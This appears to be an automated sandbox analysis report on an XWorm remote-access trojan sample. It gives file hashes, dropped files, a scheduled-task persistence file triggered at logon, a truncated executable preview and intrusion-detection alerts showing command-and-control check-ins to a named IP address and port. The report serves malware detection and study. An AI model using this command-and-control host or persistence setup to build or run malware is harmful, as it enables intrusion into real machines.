              SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
              SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
              SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:true
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):2232
                                                                      Entropy (8bit):5.379677338874509
                                                                      Encrypted:false
                                                                      SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZSUyus:tLHxvIIwLgZ2KRHWLOugEs
                                                                      MD5:CDD49264DF85EB760D31ACA6C430734F
                                                                      SHA1:1EE7B95307CF8A61FA4031F5FAA2EE2EAA98853C
                                                                      SHA-256:155727CEC1ED0F44E6D6B68D91027D5FFE2752324B033A6BC4D0759BD4E73812
                                                                      SHA-512:9F6B2E807AB4430494BBE31D015F1758C712CB5306B88CDF545DB0890EABB52E140BBB649AD989328146A0594271A1857C02E581DE96504EE673B34D2F38DC24
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:Generic INItialization configuration [WIN]
                                                                      Category:dropped
                                                                      Size (bytes):58
                                                                      Entropy (8bit):3.598349098128234
                                                                      Encrypted:false
                                                                      SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                                      MD5:5362ACB758D5B0134C33D457FCC002D9
                                                                      SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                                      SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                                      SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                                      Malicious:false
                                                                      Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1580
                                                                      Entropy (8bit):5.117777286684185
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                      MD5:F659B281A1724D379D187BF4921815E0
                                                                      SHA1:0C82F950FD6882B140668C582FBE26E24D435EF9
                                                                      SHA-256:D9D9C8608F7EAAA9EEBB8BF106EB2B3CA6B5D10DB6654C8E7837384B4209EB67
                                                                      SHA-512:890317690A04FAA4F19B0A8D68EBE055D203E50289B3BC60B90DAFBECA30E33359575B6AB74AD9897D68530EB690106F7A856D1735C541ADB2E176EE4351239F
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1580
                                                                      Entropy (8bit):5.117777286684185
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                      MD5:F659B281A1724D379D187BF4921815E0
                                                                      SHA1:0C82F950FD6882B140668C582FBE26E24D435EF9
                                                                      SHA-256:D9D9C8608F7EAAA9EEBB8BF106EB2B3CA6B5D10DB6654C8E7837384B4209EB67
                                                                      SHA-512:890317690A04FAA4F19B0A8D68EBE055D203E50289B3BC60B90DAFBECA30E33359575B6AB74AD9897D68530EB690106F7A856D1735C541ADB2E176EE4351239F
                                                                      Malicious:true
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                      Process:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1580
                                                                      Entropy (8bit):5.117777286684185
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                      MD5:F659B281A1724D379D187BF4921815E0
                                                                      SHA1:0C82F950FD6882B140668C582FBE26E24D435EF9
                                                                      SHA-256:D9D9C8608F7EAAA9EEBB8BF106EB2B3CA6B5D10DB6654C8E7837384B4209EB67
                                                                      SHA-512:890317690A04FAA4F19B0A8D68EBE055D203E50289B3BC60B90DAFBECA30E33359575B6AB74AD9897D68530EB690106F7A856D1735C541ADB2E176EE4351239F
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                      Process:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1580
                                                                      Entropy (8bit):5.117777286684185
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                      MD5:F659B281A1724D379D187BF4921815E0
                                                                      SHA1:0C82F950FD6882B140668C582FBE26E24D435EF9
                                                                      SHA-256:D9D9C8608F7EAAA9EEBB8BF106EB2B3CA6B5D10DB6654C8E7837384B4209EB67
                                                                      SHA-512:890317690A04FAA4F19B0A8D68EBE055D203E50289B3BC60B90DAFBECA30E33359575B6AB74AD9897D68530EB690106F7A856D1735C541ADB2E176EE4351239F
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):450048
                                                                      Entropy (8bit):7.90029136666667
                                                                      Encrypted:false
                                                                      SSDEEP:6144:ucNDV2oul+zXcaE1RvqWacCBlDTTUwGIoYX27kbkbBkXaqZgLSdD+cQXI2j+Jz7z:ucNDo7ZpaFbcSi7HbGpgLgOXI2jkXZ1
                                                                      MD5:BF7866489443A237806A4D3D5701CDF3
                                                                      SHA1:FFBE2847590E876892B41585784B40144C224160
                                                                      SHA-256:1070BF3C0F917624660BEF57D24E6B2CF982DCE067E95EB8A041586C0F41A095
                                                                      SHA-512:E9BB9D5157D2011EED5F5013AF4145877E3237DEF266F2CC6FD769ED7065A4FA227F7D316DE5FC7EEAE8F3F852B685FB3CC166127F79134F1FA1A200B8C0C186
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                                       • Antivirus: Virustotal, Detection: 55%
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Nov 25 04:25:02 2024, mtime=Mon Nov 25 04:25:03 2024, atime=Mon Nov 25 04:25:03 2024, length=450048, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):806
                                                                      Entropy (8bit):5.106269322557677
                                                                      Encrypted:false
                                                                      SSDEEP:12:8BlC8m8ZCM4LuSWCbdY//8xSLnmi8TSjEjABrH+ifp4TBmV:8zQuY+UW3hQABy3TBm
                                                                      MD5:C22CE3514EB3ADF537C8EB8AEFEF0620
                                                                      SHA1:70CDDB00F18F88668F5CE5F59D892908D50D9346
                                                                      SHA-256:D00885E42B2430E817CA1884600DC35E97BB72D8B410728B7BA522D43D14BE75
                                                                      SHA-512:25F4A8C7A04D14B1C3A6D7BDAC974E841B9B86D0A1F1122746CAB937BD6BADD6757F0543210CEA619EA3B74B1127F39B2F8596282FA76015ABBFFCCF3FBFC1D5
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):450048
                                                                      Entropy (8bit):7.90029136666667
                                                                      Encrypted:false
                                                                      SSDEEP:6144:ucNDV2oul+zXcaE1RvqWacCBlDTTUwGIoYX27kbkbBkXaqZgLSdD+cQXI2j+Jz7z:ucNDo7ZpaFbcSi7HbGpgLgOXI2jkXZ1
                                                                      MD5:BF7866489443A237806A4D3D5701CDF3
                                                                      SHA1:FFBE2847590E876892B41585784B40144C224160
                                                                      SHA-256:1070BF3C0F917624660BEF57D24E6B2CF982DCE067E95EB8A041586C0F41A095
                                                                      SHA-512:E9BB9D5157D2011EED5F5013AF4145877E3237DEF266F2CC6FD769ED7065A4FA227F7D316DE5FC7EEAE8F3F852B685FB3CC166127F79134F1FA1A200B8C0C186
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 58%
• Antivirus: Virustotal, Detection: 55%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."(<g..............0.............V.... ........@.. .......................@............@.....................................O.......L.................... ..........T............................................ ............... ..H............text...\.... ...................... ..`.rsrc...L...........................@..@.reloc....... ......................@..B................6.......H........}...O......i....................................................0..$..........s......s.....s ......o!...&..+..*.0..)........s\....s.......o[...s......o".......+...*....0..+........s\....r...p.(#......o[...s......o$....+..*..0..0........s\....rC..p.r...p(%......o[...s......o$....+..*.0...........s\.......O...%.r...p.%...%.r...p.%...%.r...p.%....%.r!..p.%....%.r;..p.%.....%..rU..p.%.....%..ry..p.%....%..r...p.(&......o[...s.......o$...&r...p('...&......o(...('...&...*.
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                      Category:dropped
                                                                      Size (bytes):1835008
                                                                      Entropy (8bit):4.46583317555289
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YIXfpi67eLPU9skLmb0b4BWSPKaJG8nAgejZMMhA2gX4WABl0uNNdwBCswSbU:NXD94BWlLZMM6YFHr+U
                                                                      MD5:8241812D351C515A1C514F8B0FB8F05E
                                                                      SHA1:65054D06CC9F5191B4D3C6C7AD5E290895B4CFE0
                                                                      SHA-256:74C0720D36D916D7D3A30C8367409113C1C9EDC7FA0E5B0CD8BCFCF211681E65
                                                                      SHA-512:7DD8B8DBCCD563344046F9D2E20488A5F4F8D8844DE00656571D1D67332C5F8DAE6270BF4C0BD0340C7B3A5B9245E9D7F307064D148FB8BCFCD6447ECF667151
                                                                      Malicious:false
                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....>..............................................................................................................................................................................................................................................................................................................................................ZG..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.90029136666667
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      File name:9758xBqgE1azKnB.exe
                                                                      File size:450'048 bytes
                                                                      MD5:bf7866489443a237806a4d3d5701cdf3
                                                                      SHA1:ffbe2847590e876892b41585784b40144c224160
                                                                      SHA256:1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095
                                                                      SHA512:e9bb9d5157d2011eed5f5013af4145877e3237def266f2cc6fd769ed7065a4fa227f7d316de5fc7eeae8f3f852b685fb3cc166127f79134f1fa1a200b8c0c186
                                                                      SSDEEP:6144:ucNDV2oul+zXcaE1RvqWacCBlDTTUwGIoYX27kbkbBkXaqZgLSdD+cQXI2j+Jz7z:ucNDo7ZpaFbcSi7HbGpgLgOXI2jkXZ1
                                                                      TLSH:5FA4029062AC8FBBE0BD9FF26166B05027F6396F2421F24D5FC261DD296AF006350B57
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."(<g..............0.............V.... ........@.. .......................@............@................................
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x46f056
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x673C2822 [Tue Nov 19 05:54:42 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6f002 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0x64c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6cf00 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x6d05c | 0x6d200 | f364872a41e4bf9fc09cdf5f01041c39 | False | 0.9330747064719358 | data | 7.9146348506405895 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x70000 | 0x64c | 0x800 | cbc4a37c85e29bb1836ef7fda56f9d3f | False | 0.34228515625 | data | 3.5159313995256327 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0xc | 0x200 | 711c25bdf113b2ff00e49977e3c95b33 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x70090 | 0x3bc | data | | | 0.41527196652719667
RT_MANIFEST | 0x7045c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T06:25:13.034497+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:25:13.034497+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:25:15.971536+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49735 | 18.181.154.24 | 7000 | TCP
2024-11-25T06:25:43.034632+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:25:43.034632+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:26:13.077926+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:26:13.077926+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
